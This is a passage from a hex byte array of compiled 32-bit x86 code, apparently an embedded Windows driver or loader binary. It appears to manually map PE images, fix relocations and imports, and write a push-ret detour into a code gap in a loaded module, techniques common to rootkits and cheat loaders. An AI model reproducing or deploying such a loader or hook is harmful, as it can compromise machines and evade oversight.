0x00,0xc1,0xe1,0x08,0x8b,0x55,0xe8,0x0f,0xb7,0x42,0x02,0x25,0x00,0xff,0x00,0x00, 0xc1,0xf8,0x08,0x03,0xc8,0x51,0x8b,0x4d,0xe8,0x0f,0xb6,0x51,0x09,0x52,0x8d,0x45, 0xd8,0x50,0x8d,0x4d,0xf0,0x51,0x68,0xe8,0x08,0x00,0x10,0xe8,0x22,0x07,0x00,0x00, 0x83,0xc4,0x14,0xc7,0x45,0xd4,0x34,0x09,0x00,0x10,0xc7,0x45,0xcc,0x00,0x00,0x00, 0x00,0xeb,0x09,0x8b,0x55,0xcc,0x83,0xc2,0x01,0x89,0x55,0xcc,0x8b,0x45,0xd4,0x50, 0xe8,0xb1,0x07,0x00,0x00,0x83,0xc4,0x04,0x8b,0x4d,0x10,0x2b,0xc8,0x39,0x4d,0xcc, 0x0f,0x83,0x8d,0x00,0x00,0x00,0x8b,0x55,0xd4,0x52,0xe8,0x97,0x07,0x00,0x00,0x83, 0xc4,0x04,0x50,0x8b,0x45,0xd4,0x50,0x8b,0x4d,0x0c,0x03,0x4d,0xcc,0x51,0xff,0x15, 0xe8,0x02,0x00,0x10,0x8b,0xf0,0x8b,0x55,0xd4,0x52,0xe8,0x77,0x07,0x00,0x00,0x83, 0xc4,0x04,0x3b,0xf0,0x75,0x58,0x68,0x48,0x09,0x00,0x10,0xe8,0xb2,0x06,0x00,0x00, 0x83,0xc4,0x04,0xc7,0x45,0xc4,0x00,0x00,0x00,0x00,0x6a,0x00,0x68,0x40,0x23,0x00, 0x10,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xff,0xff,0x1f,0x00,0x8d,0x45,0xc4,0x50, 0xff,0x15,0xf4,0x02,0x00,0x10,0x89,0x45,0xc8,0x83,0x7d,0xc8,0x00,0x7c,0x0c,0x8b, 0x4d,0xc4,0x51,0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,0xc8,0x52,0x68, 0x94,0x09,0x00,0x10,0xe8,0x69,0x06,0x00,0x00,0x83,0xc4,0x08,0xeb,0x05,0xe9,0x50, 0xff,0xff,0xff,0x5e,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x08,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x33,0xc0,0x89, 0x45,0xfc,0xc7,0x45,0xf8,0x80,0x3c,0x36,0xfe,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff, 0x8b,0x4d,0x08,0x51,0x68,0xbc,0x09,0x00,0x10,0xe8,0x24,0x06,0x00,0x00,0x83,0xc4, 0x08,0x68,0x70,0x23,0x00,0x10,0xe8,0x35,0xf7,0xff,0xff,0xe8,0xf0,0xf5,0xff,0xff, 0x8d,0x55,0xf8,0x52,0x6a,0x00,0x6a,0x00,0xff,0x15,0xbc,0x02,0x00,0x10,0x83,0x7d, 0x08,0x00,0x74,0x0c,0x6a,0x00,0x8b,0x45,0x08,0x50,0xff,0x15,0x90,0x02,0x00,0x10, 0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0x3d,0x1c,0x2e,0x00,0x10,0x00,0x75,0x05,0x8b,0x45,0x08,0xeb, 0x0c,0x8b,0x45,0x08,0x2b,0x05,0x1c,0x2e,0x00,0x10,0x03,0x45,0x0c,0x5d,0xc2,0x08, 0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x14,0x8b,0x45,0x0c,0x50,0x8b,0x4d,0x08,0x51,0xe8,0x2d, 0x12,0x00,0x00,0x0f,0xb6,0xd0,0x85,0xd2,0x75,0x0a,0xb8,0x01,0x00,0x00,0xc0,0xe9, 0x54,0x01,0x00,0x00,0xa1,0x1c,0x2e,0x00,0x10,0x50,0x68,0xc0,0x0b,0x00,0x10,0xe8, 0x7e,0x05,0x00,0x00,0x83,0xc4,0x08,0x6a,0x00,0xe8,0x92,0xf6,0xff,0xff,0x83,0x3d, 0x1c,0x2e,0x00,0x10,0x00,0x75,0x0a,0xb8,0x01,0x00,0x00,0xc0,0xe9,0x27,0x01,0x00, 0x00,0x8b,0x0d,0x1c,0x2e,0x00,0x10,0x8b,0x15,0x1c,0x2e,0x00,0x10,0x03,0x51,0x3c, 0x89,0x55,0xf8,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xf8,0x8d,0x44,0x0a, 0x18,0x89,0x45,0xf4,0xc7,0x45,0xf0,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x4d,0xf0, 0x83,0xc1,0x01,0x89,0x4d,0xf0,0x8b,0x55,0xf8,0x0f,0xb7,0x42,0x06,0x39,0x45,0xf0, 0x0f,0x83,0x89,0x00,0x00,0x00,0x83,0x3d,0x00,0x2e,0x00,0x10,0x00,0x75,0x0c,0x8b, 0x4d,0xf4,0x8b,0x51,0x0c,0x89,0x15,0x00,0x2e,0x00,0x10,0x8b,0x45,0xf4,0x8b,0x48, 0x24,0x81,0xe1,0x00,0x00,0x00,0x02,0x74,0x13,0x8b,0x55,0xf4,0x8b,0x42,0x24,0x25, 0xff,0xff,0xff,0xfd,0x8b,0x4d,0xf4,0x89,0x41,0x24,0xeb,0x45,0x8b,0x55,0xf8,0x8b, 0x42,0x38,0x83,0xe8,0x01,0x8b,0x4d,0xf4,0x23,0x41,0x08,0x74,0x1c,0x8b,0x55,0xf8, 0x8b,0x42,0x38,0x83,0xe8,0x01,0xf7,0xd0,0x8b,0x4d,0xf4,0x23,0x41,0x08,0x8b,0x55, 0xf8,0x03,0x42,0x38,0x89,0x45,0xec,0xeb,0x09,0x8b,0x45,0xf4,0x8b,0x48,0x08,0x89, 0x4d,0xec,0x8b,0x15,0x04,0x2e,0x00,0x10,0x03,0x55,0xec,0x89,0x15,0x04,0x2e,0x00, 0x10,0x8b,0x45,0xf4,0x83,0xc0,0x28,0x89,0x45,0xf4,0xe9,0x5e,0xff,0xff,0xff,0x8b, 0x0d,0x00,0x2e,0x00,0x10,0x51,0x8b,0x15,0x04,0x2e,0x00,0x10,0x52,0x68,0xe4,0x0b, 0x00,0x10,0xe8,0x7b,0x04,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x45,0xf8,0x8b,0x0d,0x1c, 0x2e,0x00,0x10,0x89,0x48,0x34,0x8b,0x55,0xf8,0x8b,0x42,0x50,0xa3,0xfc,0x2d,0x00, 0x10,0x68,0x00,0x54,0x00,0x10,0xff,0x15,0x08,0x03,0x00,0x10,0x89,0x45,0xfc,0x83, 0x7d,0xfc,0x00,0x7d,0x11,0x8b,0x4d,0xfc,0x51,0x68,0x0c,0x0c,0x00,0x10,0xe8,0x3f, 0x04,0x00,0x00,0x83,0xc4,0x08,0x33,0xc0,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x20,0x01,0x00,0x00,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03, 0x48,0x3c,0x89,0x4d,0xf8,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0x8b,0x55,0xf8,0x0f, 0xb7,0x42,0x04,0x3d,0x4c,0x01,0x00,0x00,0x75,0x1d,0x8b,0x4d,0xf8,0x83,0xb9,0x80, 0x00,0x00,0x00,0x00,0x74,0x0f,0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x82,0x80,0x00, 0x00,0x00,0x89,0x45,0xfc,0xeb,0x3f,0x8b,0x4d,0xf8,0x0f,0xb7,0x51,0x04,0x81,0xfa, 0x64,0x86,0x00,0x00,0x75,0x29,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89, 0x4d,0xf4,0x8b,0x55,0xf4,0x83,0xba,0x90,0x00,0x00,0x00,0x00,0x74,0x0f,0x8b,0x45, 0xf4,0x8b,0x4d,0x08,0x03,0x88,0x90,0x00,0x00,0x00,0x89,0x4d,0xfc,0xeb,0x07,0x32, 0xc0,0xe9,0xd7,0x00,0x00,0x00,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xcb,0x00,0x00,0x00, 0x8b,0x55,0xfc,0x83,0x7a,0x0c,0x00,0x0f,0x84,0xbe,0x00,0x00,0x00,0x8b,0x45,0xfc, 0x8b,0x4d,0x08,0x03,0x48,0x0c,0x51,0x8d,0x95,0xf0,0xfe,0xff,0xff,0x52,0xe8,0xdd, 0x0a,0x00,0x00,0x8b,0x45,0x0c,0x50,0x8d,0x8d,0xf0,0xfe,0xff,0xff,0x51,0xe8,0x1d, 0x0b,0x00,0x00,0x50,0xe8,0x57,0x0a,0x00,0x00,0x85,0xc0,0x74,0x04,0xeb,0x7e,0xeb, 0x7c,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x10,0x89,0x85,0xec,0xfe,0xff,0xff, 0x8b,0x8d,0xec,0xfe,0xff,0xff,0x83,0x39,0x00,0x74,0x62,0x8b,0x95,0xec,0xfe,0xff, 0xff,0x8b,0x45,0x08,0x03,0x02,0x89,0x85,0xe0,0xfe,0xff,0xff,0x8b,0x8d,0xe0,0xfe, 0xff,0xff,0x83,0xc1,0x02,0x89,0x8d,0xe4,0xfe,0xff,0xff,0x8b,0x95,0xe4,0xfe,0xff, 0xff,0x52,0x8b,0x45,0x10,0x50,0xe8,0x35,0x0c,0x00,0x00,0x89,0x85,0xe8,0xfe,0xff, 0xff,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x00,0x75,0x04,0x32,0xc0,0xeb,0x2f,0x8b,0x8d, 0xec,0xfe,0xff,0xff,0x8b,0x95,0xe8,0xfe,0xff,0xff,0x89,0x11,0x8b,0x85,0xec,0xfe, 0xff,0xff,0x83,0xc0,0x04,0x89,0x85,0xec,0xfe,0xff,0xff,0xeb,0x93,0x8b,0x4d,0xfc, 0x83,0xc1,0x14,0x89,0x4d,0xfc,0xe9,0x35,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d, 0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x30,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89, 0x4d,0xf8,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00, 0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0x8b,0x55, 0xf8,0x0f,0xb7,0x42,0x04,0x3d,0x4c,0x01,0x00,0x00,0x75,0x37,0x8b,0x4d,0xf8,0x83, 0xb9,0xa0,0x00,0x00,0x00,0x00,0x74,0x1b,0x8b,0x55,0xf8,0x8b,0x45,0x08,0x03,0x82, 0xa0,0x00,0x00,0x00,0x89,0x45,0xf4,0x8b,0x4d,0xf8,0x8b,0x91,0xa4,0x00,0x00,0x00, 0x89,0x55,0xfc,0x8b,0x45,0xf8,0x8b,0x48,0x34,0x33,0xd2,0x89,0x4d,0xe8,0x89,0x55, 0xec,0xeb,0x5a,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x04,0x81,0xf9,0x64,0x86,0x00,0x00, 0x75,0x44,0x8b,0x55,0x08,0x8b,0x45,0x08,0x03,0x42,0x3c,0x89,0x45,0xe4,0x8b,0x4d, 0xe4,0x83,0xb9,0xb0,0x00,0x00,0x00,0x00,0x74,0x1b,0x8b,0x55,0xe4,0x8b,0x45,0x08, 0x03,0x82,0xb0,0x00,0x00,0x00,0x89,0x45,0xf4,0x8b,0x4d,0xe4,0x8b,0x91,0xb4,0x00, 0x00,0x00,0x89,0x55,0xfc,0x8b,0x45,0xe4,0x8b,0x48,0x30,0x89,0x4d,0xe8,0x8b,0x50, 0x34,0x89,0x55,0xec,0xeb,0x07,0x32,0xc0,0xe9,0xff,0x00,0x00,0x00,0x83,0x7d,0xf4, 0x00,0x0f,0x84,0xf3,0x00,0x00,0x00,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0x8b,0x45, 0xfc,0x3b,0x45,0xe0,0x0f,0x86,0xe0,0x00,0x00,0x00,0x8b,0x4d,0xf4,0x83,0x79,0x04, 0x00,0x0f,0x84,0xd3,0x00,0x00,0x00,0x8b,0x55,0xf4,0x8b,0x42,0x04,0x83,0xe8,0x08, 0xd1,0xe8,0x89,0x45,0xd8,0x8b,0x4d,0xf4,0x83,0xc1,0x08,0x89,0x4d,0xdc,0xc7,0x45, 0xd4,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xd4,0x83,0xc2,0x01,0x89,0x55,0xd4, 0x8b,0x45,0xd4,0x3b,0x45,0xd8,0x0f,0x83,0x81,0x00,0x00,0x00,0x8b,0x4d,0xd4,0x8b, 0x55,0xdc,0x0f,0xb7,0x04,0x4a,0x85,0xc0,0x7e,0x6e,0x8b,0x4d,0xd4,0x8b,0x55,0xdc, 0x0f,0xb7,0x04,0x4a,0x25,0x00,0xf0,0x00,0x00,0xc1,0xf8,0x0c,0x66,0x89,0x45,0xd0, 0x0f,0xb7,0x4d,0xd0,0x83,0xf9,0x03,0x74,0x0d,0x0f,0xb7,0x55,0xd0,0x83,0xfa,0x0a, 0x74,0x04,0x32,0xc0,0xeb,0x66,0x8b,0x45,0xd4,0x8b,0x4d,0xdc,0x0f,0xb7,0x14,0x41, 0x81,0xe2,0xff,0x0f,0x00,0x00,0x8b,0x45,0xf4,0x8b,0x08,0x03,0xca,0x8b,0x45,0x0c, 0x99,0x2b,0x45,0xe8,0x1b,0x55,0xec,0x8b,0x55,0x08,0x03,0x04,0x0a,0x8b,0x4d,0xd4, 0x8b,0x55,0xdc,0x0f,0xb7,0x0c,0x4a,0x81,0xe1,0xff,0x0f,0x00,0x00,0x8b,0x55,0xf4, 0x03,0x0a,0x8b,0x55,0x08,0x89,0x04,0x0a,0xe9,0x6a,0xff,0xff,0xff,0x8b,0x45,0xf4, 0x8b,0x4d,0xf4,0x03,0x48,0x04,0x89,0x4d,0xf4,0x8b,0x55,0xf4,0x8b,0x45,0xe0,0x03, 0x42,0x04,0x89,0x45,0xe0,0xe9,0x14,0xff,0xff,0xff,0xb0,0x01,0x8b,0xe5,0x5d,0xc2, 0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x10,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0xc7,0x45,0xf8, 0x00,0x01,0x00,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0xb8,0x01,0x00,0x00,0x00, 0x85,0xc0,0x0f,0x84,0x84,0x00,0x00,0x00,0x8b,0x4d,0xf8,0x51,0x6a,0x00,0xff,0x15, 0xe0,0x02,0x00,0x10,0x89,0x45,0xf4,0x83,0x7d,0xf4,0x00,0x75,0x14,0x68,0x3c,0x0c, 0x00,0x10,0xe8,0x9b,0x00,0x00,0x00,0x83,0xc4,0x04,0x33,0xc0,0xe9,0x8b,0x00,0x00, 0x00,0xc7,0x45,0xf0,0x00,0x00,0x00,0x00,0x8d,0x55,0xf0,0x52,0x8b,0x45,0xf8,0x50, 0x8b,0x4d,0xf4,0x51,0x8b,0x55,0x08,0x52,0xff,0x15,0x0c,0x03,0x00,0x10,0x89,0x45, 0xfc,0x81,0x7d,0xfc,0x04,0x00,0x00,0xc0,0x75,0x2b,0x6a,0x00,0x8b,0x45,0xf4,0x50, 0xff,0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xf4,0x00,0x00,0x00,0x00,0x83,0x7d,0xf0, 0x00,0x76,0x0e,0x8b,0x4d,0xf0,0x81,0xc1,0x00,0x01,0x00,0x00,0x89,0x4d,0xf8,0xeb, 0x02,0xeb,0x09,0xeb,0x02,0xeb,0x05,0xe9,0x6f,0xff,0xff,0xff,0x83,0x7d,0xfc,0x00, 0x7d,0x27,0x8b,0x55,0xfc,0x52,0x68,0x54,0x0c,0x00,0x10,0xe8,0x22,0x00,0x00,0x00, 0x83,0xc4,0x08,0x83,0x7d,0xf4,0x00,0x74,0x0c,0x6a,0x00,0x8b,0x45,0xf4,0x50,0xff, 0x15,0x90,0x02,0x00,0x10,0x33,0xc0,0xeb,0x03,0x8b,0x45,0xf4,0x8b,0xe5,0x5d,0xc2, 0x04,0x00,0xff,0x25,0x28,0x03,0x00,0x10,0xff,0x25,0x20,0x03,0x00,0x10,0xff,0x25, 0x1c,0x03,0x00,0x10,0xff,0x25,0xd4,0x02,0x00,0x10,0xff,0x25,0x90,0x02,0x00,0x10, 0xff,0x25,0x94,0x02,0x00,0x10,0xff,0x25,0x98,0x02,0x00,0x10,0xff,0x25,0x9c,0x02, 0x00,0x10,0xff,0x25,0xa0,0x02,0x00,0x10,0xff,0x25,0xa4,0x02,0x00,0x10,0xff,0x25, 0xa8,0x02,0x00,0x10,0xff,0x25,0xac,0x02,0x00,0x10,0xff,0x25,0xb0,0x02,0x00,0x10, 0xff,0x25,0xb4,0x02,0x00,0x10,0xff,0x25,0xb8,0x02,0x00,0x10,0xff,0x25,0xbc,0x02, 0x00,0x10,0xff,0x25,0xc0,0x02,0x00,0x10,0xff,0x25,0xc4,0x02,0x00,0x10,0xff,0x25, 0xc8,0x02,0x00,0x10,0xff,0x25,0xcc,0x02,0x00,0x10,0xff,0x25,0xd0,0x02,0x00,0x10, 0xff,0x25,0x24,0x03,0x00,0x10,0xff,0x25,0xd8,0x02,0x00,0x10,0xff,0x25,0xdc,0x02, 0x00,0x10,0xff,0x25,0xe0,0x02,0x00,0x10,0xff,0x25,0xe4,0x02,0x00,0x10,0xff,0x25, 0xe8,0x02,0x00,0x10,0xff,0x25,0xec,0x02,0x00,0x10,0xff,0x25,0xf0,0x02,0x00,0x10, 0xff,0x25,0xf4,0x02,0x00,0x10,0xff,0x25,0xf8,0x02,0x00,0x10,0xff,0x25,0xfc,0x02, 0x00,0x10,0xff,0x25,0x00,0x03,0x00,0x10,0xff,0x25,0x04,0x03,0x00,0x10,0xff,0x25, 0x08,0x03,0x00,0x10,0xff,0x25,0x0c,0x03,0x00,0x10,0xff,0x25,0x10,0x03,0x00,0x10, 0xff,0x25,0x14,0x03,0x00,0x10,0xff,0x25,0x18,0x03,0x00,0x10,0xff,0x25,0x84,0x02, 0x00,0x10,0xff,0x25,0x80,0x02,0x00,0x10,0xff,0x25,0x88,0x02,0x00,0x10,0xcc,0xcc, 0xff,0xff,0xff,0xff,0xdc,0x16,0x00,0x10,0xe2,0x16,0x00,0x10,0x00,0x00,0x00,0x00, 0xff,0xff,0xff,0xff,0x65,0x1a,0x00,0x10,0x6b,0x1a,0x00,0x10,0x00,0x00,0x00,0x00, 0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,0x97,0x20,0x00,0x10,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xec,0x0a,0x00,0x10,0x00,0x0b,0x00,0x10,0x18,0x0b,0x00,0x10, 0x34,0x0b,0x00,0x10,0x50,0x0b,0x00,0x10,0x64,0x0b,0x00,0x10,0x78,0x0b,0x00,0x10, 0x40,0xbb,0x00,0x00,0xbf,0x44,0xff,0xff,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00, 0x74,0x38,0x8b,0x4d,0xfc,0x03,0x0d,0x84,0x2d,0x00,0x10,0x89,0x4d,0xf8,0x6a,0x01, 0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6, 0xc8,0x85,0xc9,0x74,0x05,0x8b,0x45,0xfc,0xeb,0x12,0x8b,0x55,0xfc,0x03,0x15,0x8c, 0x2d,0x00,0x10,0x8b,0x02,0x89,0x45,0xfc,0xeb,0xc2,0x33,0xc0,0x8b,0xe5,0x5d,0xc2, 0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0x7d,0x0c,0x00,0x74,0x0f,0x8b,0x45,0x0c,0x03,0x05,0x90,0x2d, 0x00,0x10,0x8b,0x00,0xeb,0x11,0xeb,0x0d,0x8b,0x4d,0x08,0x03,0x0d,0x88,0x2d,0x00, 0x10,0x8b,0x01,0xeb,0x02,0x33,0xc0,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x8b,0x45,0x08,0x03,0x05,0x94,0x2d,0x00,0x10,0x8b,0x00,0x5d,0xc2, 0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x38,0xc7,0x45,0xe8,0x00,0x00,0x00,0x00,0x6a,0x0b,0xe8, 0xbc,0xfb,0xff,0xff,0x89,0x45,0xf0,0x83,0x7d,0xf0,0x00,0x74,0x79,0xc7,0x45,0xe4, 0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xe4,0x83,0xc0,0x01,0x89,0x45,0xe4,0x8b, 0x4d,0xf0,0x8b,0x55,0xe4,0x3b,0x11,0x73,0x51,0x8b,0x45,0xe4,0x69,0xc0,0x1c,0x01, 0x00,0x00,0x8b,0x4d,0xf0,0x8b,0x55,0x08,0x3b,0x54,0x01,0x0c,0x76,0x3a,0x8b,0x45, 0xe4,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xe4,0x69,0xc9,0x1c,0x01,0x00,0x00, 0x8b,0x55,0xf0,0x8b,0x44,0x02,0x0c,0x8b,0x55,0xf0,0x03,0x44,0x0a,0x10,0x39,0x45, 0x08,0x73,0x15,0x8b,0x45,0xe4,0x69,0xc0,0x1c,0x01,0x00,0x00,0x8b,0x4d,0xf0,0x8b, 0x54,0x01,0x0c,0x89,0x55,0xe8,0xeb,0x02,0xeb,0x9c,0x6a,0x00,0x8b,0x45,0xf0,0x50, 0xff,0x15,0x90,0x02,0x00,0x10,0x83,0x7d,0xe8,0x00,0x75,0x08,0x8b,0x45,0x0c,0xe9, 0x5c,0x01,0x00,0x00,0x8b,0x4d,0xe8,0x8b,0x55,0xe8,0x03,0x51,0x3c,0x89,0x55,0xfc, 0x8b,0x45,0xfc,0x0f,0xb7,0x48,0x14,0x8b,0x55,0xfc,0x8d,0x44,0x0a,0x18,0x89,0x45, 0xec,0x6a,0x06,0x6a,0x00,0x8d,0x4d,0xf4,0x51,0xe8,0xf0,0xfb,0xff,0xff,0x83,0xc4, 0x0c,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0xeb,0x12,0x8b,0x55,0xe0,0x83,0xc2,0x01, 0x89,0x55,0xe0,0x8b,0x45,0xec,0x83,0xc0,0x28,0x89,0x45,0xec,0x8b,0x4d,0xfc,0x0f, 0xb7,0x51,0x06,0x39,0x55,0xe0,0x0f,0x83,0x01,0x01,0x00,0x00,0x68,0xc8,0x07,0x00, 0x10,0x8b,0x45,0xec,0x50,0xe8,0x4a,0xfc,0xff,0xff,0x83,0xc4,0x08,0x85,0xc0,0x0f, 0x85,0xe3,0x00,0x00,0x00,0x8b,0x4d,0xec,0x8b,0x51,0x24,0x81,0xe2,0x00,0x00,0x00, 0x20,0x0f,0x84,0xd1,0x00,0x00,0x00,0x8b,0x45,0xec,0x8b,0x48,0x24,0x81,0xe1,0x00, 0x00,0x00,0x02,0x0f,0x85,0xbf,0x00,0x00,0x00,0x8b,0x55,0xfc,0x8b,0x42,0x38,0x83, 0xe8,0x01,0x8b,0x4d,0xec,0x23,0x41,0x08,0x74,0x1c,0x8b,0x55,0xfc,0x8b,0x42,0x38, 0x83,0xe8,0x01,0xf7,0xd0,0x8b,0x4d,0xec,0x23,0x41,0x08,0x8b,0x55,0xfc,0x03,0x42, 0x38,0x89,0x45,0xc8,0xeb,0x09,0x8b,0x45,0xec,0x8b,0x48,0x08,0x89,0x4d,0xc8,0x8b, 0x55,0xc8,0x89,0x55,0xdc,0x8b,0x45,0xec,0x8b,0x4d,0xdc,0x2b,0x48,0x08,0x89,0x4d, 0xd8,0x83,0x7d,0xd8,0x06,0x76,0x71,0x8b,0x55,0xec,0x8b,0x42,0x0c,0x8b,0x4d,0xec, 0x03,0x41,0x08,0x03,0x45,0xe8,0x89,0x45,0xd4,0x8b,0x55,0xd8,0x83,0xea,0x06,0x89, 0x55,0xd0,0xeb,0x09,0x8b,0x45,0xd0,0x83,0xe8,0x01,0x89,0x45,0xd0,0x83,0x7d,0xd0, 0x00,0x74,0x45,0x8b,0x4d,0xd4,0x03,0x4d,0xd0,0x89,0x4d,0xcc,0x6a,0x06,0x8d,0x55, 0xf4,0x52,0x8b,0x45,0xcc,0x50,0xff,0x15,0xe8,0x02,0x00,0x10,0x83,0xf8,0x06,0x75, 0x25,0xe8,0xea,0x1e,0x00,0x00,0x8b,0x4d,0xcc,0xc6,0x01,0x68,0x8b,0x55,0xcc,0x8b, 0x45,0x0c,0x89,0x42,0x01,0x8b,0x4d,0xcc,0xc6,0x41,0x05,0xc3,0xe8,0xef,0x1e,0x00, 0x00,0x8b,0x45,0xcc,0xeb,0x0a,0xeb,0xac,0xe9,0xdd,0xfe,0xff,0xff,0x8b,0x45,0x0c, 0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x28,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0xe8,0xee,0xde, 0xff,0xff,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0x26,0x01,0x00,0x00,0x68, 0xd0,0x07,0x00,0x10,0x8d,0x45,0xec,0x50,0xff,0x15,0x20,0x03,0x00,0x10,0x8d,0x4d, 0xec,0x51,0x8b,0x55,0xfc,0x52,0xe8,0x05,0xfd,0xff,0xff,0x89,0x45,0xf4,0x83,0x7d, 0xf4,0x00,0x0f,0x84,0xeb,0x00,0x00,0x00,0x8b,0x45,0xf4,0x50,0x68,0xdc,0x07,0x00, 0x10,0xe8,0x4c,0xfa,0xff,0xff,0x83,0xc4,0x08,0xc7,0x45,0xe8,0x00,0x00,0x00,0x00, 0x8b,0x4d,0xe8,0x51,0x8b,0x55,0xf4,0x52,0xe8,0x33,0xfd,0xff,0xff,0x89,0x45,0xe8, 0x83,0x7d,0xe8,0x00,0x0f,0x84,0xb7,0x00,0x00,0x00,0x8b,0x45,0xe8,0x50,0xe8,0x4d, 